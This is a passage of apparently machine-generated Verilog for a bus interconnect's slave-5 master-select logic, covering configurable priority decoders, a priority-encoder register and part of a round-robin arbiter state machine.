            if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[7] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[6] ) ) } == 2'h0 ) 
            begin
                s5_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[7] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[6] ) ) } == 2'h1 ) 
                begin
                    s5_msel_pri_enc_pd3_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[7] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[6] ) ) } == 2'h2 ) 
                    begin
                        s5_msel_pri_enc_pd3_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s5_msel_pri_enc_pd3_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s5_msel_pri_enc_valid[3] or  { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[7] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[6] ) ) })
    begin
        if (  !( s5_msel_pri_enc_valid[3]) ) 
        begin
            s5_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[7] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[6] ) ) } == 2'h0 ) 
            begin
                s5_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s5_msel_pri_enc_pd3_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s5_msel_pri_enc_valid[4] or  { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[9] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[8] ) ) })
    begin
        if (  !( s5_msel_pri_enc_valid[4]) ) 
        begin
            s5_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[9] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[8] ) ) } == 2'h0 ) 
            begin
                s5_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[9] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[8] ) ) } == 2'h1 ) 
                begin
                    s5_msel_pri_enc_pd4_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[9] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[8] ) ) } == 2'h2 ) 
                    begin
                        s5_msel_pri_enc_pd4_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s5_msel_pri_enc_pd4_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s5_msel_pri_enc_valid[4] or  { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[9] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[8] ) ) })
    begin
        if (  !( s5_msel_pri_enc_valid[4]) ) 
        begin
            s5_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[9] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[8] ) ) } == 2'h0 ) 
            begin
                s5_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s5_msel_pri_enc_pd4_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s5_msel_pri_enc_valid[5] or  { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[11] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[10] ) ) })
    begin
        if (  !( s5_msel_pri_enc_valid[5]) ) 
        begin
            s5_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[11] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[10] ) ) } == 2'h0 ) 
            begin
                s5_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[11] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[10] ) ) } == 2'h1 ) 
                begin
                    s5_msel_pri_enc_pd5_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[11] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[10] ) ) } == 2'h2 ) 
                    begin
                        s5_msel_pri_enc_pd5_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s5_msel_pri_enc_pd5_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s5_msel_pri_enc_valid[5] or  { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[11] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[10] ) ) })
    begin
        if (  !( s5_msel_pri_enc_valid[5]) ) 
        begin
            s5_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[11] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[10] ) ) } == 2'h0 ) 
            begin
                s5_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s5_msel_pri_enc_pd5_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s5_msel_pri_enc_valid[6] or  { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[13] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[12] ) ) })
    begin
        if (  !( s5_msel_pri_enc_valid[6]) ) 
        begin
            s5_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[13] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[12] ) ) } == 2'h0 ) 
            begin
                s5_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[13] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[12] ) ) } == 2'h1 ) 
                begin
                    s5_msel_pri_enc_pd6_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[13] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[12] ) ) } == 2'h2 ) 
                    begin
                        s5_msel_pri_enc_pd6_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s5_msel_pri_enc_pd6_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s5_msel_pri_enc_valid[6] or  { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[13] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[12] ) ) })
    begin
        if (  !( s5_msel_pri_enc_valid[6]) ) 
        begin
            s5_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[13] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[12] ) ) } == 2'h0 ) 
            begin
                s5_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s5_msel_pri_enc_pd6_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s5_msel_pri_enc_valid[7] or  { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[15] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[14] ) ) })
    begin
        if (  !( s5_msel_pri_enc_valid[7]) ) 
        begin
            s5_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[15] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[14] ) ) } == 2'h0 ) 
            begin
                s5_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[15] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[14] ) ) } == 2'h1 ) 
                begin
                    s5_msel_pri_enc_pd7_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[15] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[14] ) ) } == 2'h2 ) 
                    begin
                        s5_msel_pri_enc_pd7_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s5_msel_pri_enc_pd7_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s5_msel_pri_enc_valid[7] or  { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[15] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[14] ) ) })
    begin
        if (  !( s5_msel_pri_enc_valid[7]) ) 
        begin
            s5_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[15] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[14] ) ) } == 2'h0 ) 
            begin
                s5_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s5_msel_pri_enc_pd7_pri_out_d0 = 4'b0010;
            end
        end
    end
    assign s5_msel_pri_enc_pri_out_tmp = ( ( ( ( ( ( ( ( ( ( s5_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s5_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s5_msel_pri_enc_pd0_pri_out_d0 ) : ( s5_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s5_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s5_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s5_msel_pri_enc_pd1_pri_out_d0 ) : ( s5_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s5_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s5_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s5_msel_pri_enc_pd2_pri_out_d0 ) : ( s5_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s5_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s5_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s5_msel_pri_enc_pd3_pri_out_d0 ) : ( s5_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s5_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s5_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s5_msel_pri_enc_pd4_pri_out_d0 ) : ( s5_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s5_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s5_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s5_msel_pri_enc_pd5_pri_out_d0 ) : ( s5_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s5_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s5_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s5_msel_pri_enc_pd6_pri_out_d0 ) : ( s5_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s5_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s5_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s5_msel_pri_enc_pd7_pri_out_d0 ) : ( s5_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) );
    always @ (  ( ( ( ( ( ( ( ( ( ( s5_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s5_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s5_msel_pri_enc_pd0_pri_out_d0 ) : ( s5_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s5_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s5_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s5_msel_pri_enc_pd1_pri_out_d0 ) : ( s5_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s5_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s5_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s5_msel_pri_enc_pd2_pri_out_d0 ) : ( s5_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s5_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s5_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s5_msel_pri_enc_pd3_pri_out_d0 ) : ( s5_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s5_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s5_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s5_msel_pri_enc_pd4_pri_out_d0 ) : ( s5_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s5_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s5_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s5_msel_pri_enc_pd5_pri_out_d0 ) : ( s5_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s5_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s5_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s5_msel_pri_enc_pd6_pri_out_d0 ) : ( s5_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s5_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s5_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s5_msel_pri_enc_pd7_pri_out_d0 ) : ( s5_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s5_msel_pri_enc_pri_out_tmp[3] ) 
        begin
            s5_msel_pri_enc_pri_out1 = 2'h3;
        end
        else
        begin 
            if ( s5_msel_pri_enc_pri_out_tmp[2] ) 
            begin
                s5_msel_pri_enc_pri_out1 = 2'h2;
            end
            else
            begin 
                if ( s5_msel_pri_enc_pri_out_tmp[1] ) 
                begin
                    s5_msel_pri_enc_pri_out1 = 2'h1;
                end
                else
                begin 
                    s5_msel_pri_enc_pri_out1 = 2'h0;
                end
            end
        end
    end
    always @ (  ( ( ( ( ( ( ( ( ( ( s5_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s5_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s5_msel_pri_enc_pd0_pri_out_d0 ) : ( s5_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s5_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s5_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s5_msel_pri_enc_pd1_pri_out_d0 ) : ( s5_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s5_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s5_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s5_msel_pri_enc_pd2_pri_out_d0 ) : ( s5_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s5_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s5_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s5_msel_pri_enc_pd3_pri_out_d0 ) : ( s5_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s5_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s5_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s5_msel_pri_enc_pd4_pri_out_d0 ) : ( s5_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s5_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s5_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s5_msel_pri_enc_pd5_pri_out_d0 ) : ( s5_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s5_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s5_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s5_msel_pri_enc_pd6_pri_out_d0 ) : ( s5_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s5_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s5_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s5_msel_pri_enc_pd7_pri_out_d0 ) : ( s5_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s5_msel_pri_enc_pri_out_tmp[1] ) 
        begin
            s5_msel_pri_enc_pri_out0 = 2'h1;
        end
        else
        begin 
            s5_msel_pri_enc_pri_out0 = 2'h0;
        end
    end
    always @ (  posedge clk_i)
    begin
        if ( rst_i ) 
        begin
            s5_msel_pri_out <= 2'h0;
        end
        else
        begin 
            if ( s5_next ) 
            begin
                s5_msel_pri_out <= ( ( ( s5_msel_pri_enc_pri_sel == 2'd0 ) ) ? ( 2'h0 ) : ( ( ( ( s5_msel_pri_enc_pri_sel == 2'd1 ) ) ? ( s5_msel_pri_enc_pri_out0 ) : ( s5_msel_pri_enc_pri_out1 ) ) ) );
            end
        end
    end
    assign s5_msel_arb0_req = { ( s5_msel_req[7] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[15] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[14] ) ) } == 2'd0 ) ), ( s5_msel_req[6] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[13] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[12] ) ) } == 2'd0 ) ), ( s5_msel_req[5] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[11] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[10] ) ) } == 2'd0 ) ), ( s5_msel_req[4] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[9] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[8] ) ) } == 2'd0 ) ), ( s5_msel_req[3] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[7] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[6] ) ) } == 2'd0 ) ), ( s5_msel_req[2] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[5] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[4] ) ) } == 2'd0 ) ), ( s5_msel_req[1] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[3] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[2] ) ) } == 2'd0 ) ), ( s5_msel_req[0] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[1] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[0] ) ) } == 2'd0 ) ) };
    assign s5_msel_arb0_gnt = s5_msel_arb0_state;
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s5_msel_arb0_state <= s5_msel_arb0_grant0;
        end
        else
        begin 
            s5_msel_arb0_state <= s5_msel_arb0_next_state;
        end
    end
    always @ (  s5_msel_arb0_state or  { ( s5_msel_req[7] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[15] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[14] ) ) } == 2'd0 ) ), ( s5_msel_req[6] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[13] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[12] ) ) } == 2'd0 ) ), ( s5_msel_req[5] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[11] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[10] ) ) } == 2'd0 ) ), ( s5_msel_req[4] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[9] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[8] ) ) } == 2'd0 ) ), ( s5_msel_req[3] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[7] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[6] ) ) } == 2'd0 ) ), ( s5_msel_req[2] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[5] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[4] ) ) } == 2'd0 ) ), ( s5_msel_req[1] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[3] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[2] ) ) } == 2'd0 ) ), ( s5_msel_req[0] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[1] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[0] ) ) } == 2'd0 ) ) } or  1'b0)
    begin
        s5_msel_arb0_next_state = s5_msel_arb0_state;
        case ( s5_msel_arb0_state ) 
        s5_msel_arb0_grant0:
        begin
            if (  !( s5_msel_arb0_req[0]) | 1'b0 ) 
            begin
                if ( s5_msel_arb0_req[1] ) 
                begin
                    s5_msel_arb0_next_state = s5_msel_arb0_grant1;
                end
                else
                begin 
                    if ( s5_msel_arb0_req[2] ) 
                    begin
                        s5_msel_arb0_next_state = s5_msel_arb0_grant2;
                    end
                    else
                    begin 
                        if ( s5_msel_arb0_req[3] ) 
                        begin
                            s5_msel_arb0_next_state = s5_msel_arb0_grant3;
                        end
                        else
                        begin 
                            if ( s5_msel_arb0_req[4] ) 
                            begin
                                s5_msel_arb0_next_state = s5_msel_arb0_grant4;
                            end
                            else
                            begin 
                                if ( s5_msel_arb0_req[5] ) 
                                begin
                                    s5_msel_arb0_next_state = s5_msel_arb0_grant5;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb0_req[6] ) 
                                    begin
                                        s5_msel_arb0_next_state = s5_msel_arb0_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb0_req[7] ) 
                                        begin
                                            s5_msel_arb0_next_state = s5_msel_arb0_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_msel_arb0_grant1:
        begin
            if (  !( s5_msel_arb0_req[1]) | 1'b0 ) 
            begin
                if ( s5_msel_arb0_req[2] ) 
                begin
                    s5_msel_arb0_next_state = s5_msel_arb0_grant2;
                end
                else
                begin 
                    if ( s5_msel_arb0_req[3] ) 
                    begin
                        s5_msel_arb0_next_state = s5_msel_arb0_grant3;
                    end
                    else
                    begin 
                        if ( s5_msel_arb0_req[4] ) 
                        begin
                            s5_msel_arb0_next_state = s5_msel_arb0_grant4;
                        end
                        else
                        begin 
                            if ( s5_msel_arb0_req[5] ) 
                            begin
                                s5_msel_arb0_next_state = s5_msel_arb0_grant5;
                            end
                            else
                            begin 
                                if ( s5_msel_arb0_req[6] ) 
                                begin
                                    s5_msel_arb0_next_state = s5_msel_arb0_grant6;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb0_req[7] ) 
                                    begin
                                        s5_msel_arb0_next_state = s5_msel_arb0_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb0_req[0] ) 
                                        begin
                                            s5_msel_arb0_next_state = s5_msel_arb0_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_msel_arb0_grant2:
        begin
            if (  !( s5_msel_arb0_req[2]) | 1'b0 ) 
            begin
                if ( s5_msel_arb0_req[3] ) 
                begin
                    s5_msel_arb0_next_state = s5_msel_arb0_grant3;
                end
                else
                begin 
                    if ( s5_msel_arb0_req[4] ) 
                    begin
                        s5_msel_arb0_next_state = s5_msel_arb0_grant4;
                    end
                    else
                    begin 
                        if ( s5_msel_arb0_req[5] ) 
                        begin
                            s5_msel_arb0_next_state = s5_msel_arb0_grant5;
                        end
                        else
                        begin 
                            if ( s5_msel_arb0_req[6] ) 
                            begin
                                s5_msel_arb0_next_state = s5_msel_arb0_grant6;
                            end
                            else
                            begin 
                                if ( s5_msel_arb0_req[7] ) 
                                begin
                                    s5_msel_arb0_next_state = s5_msel_arb0_grant7;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb0_req[0] ) 
                                    begin
                                        s5_msel_arb0_next_state = s5_msel_arb0_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb0_req[1] ) 
                                        begin
                                            s5_msel_arb0_next_state = s5_msel_arb0_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_msel_arb0_grant3:
        begin
            if (  !( s5_msel_arb0_req[3]) | 1'b0 ) 
            begin
                if ( s5_msel_arb0_req[4] ) 
                begin
                    s5_msel_arb0_next_state = s5_msel_arb0_grant4;
                end
                else
                begin 
                    if ( s5_msel_arb0_req[5] ) 
                    begin
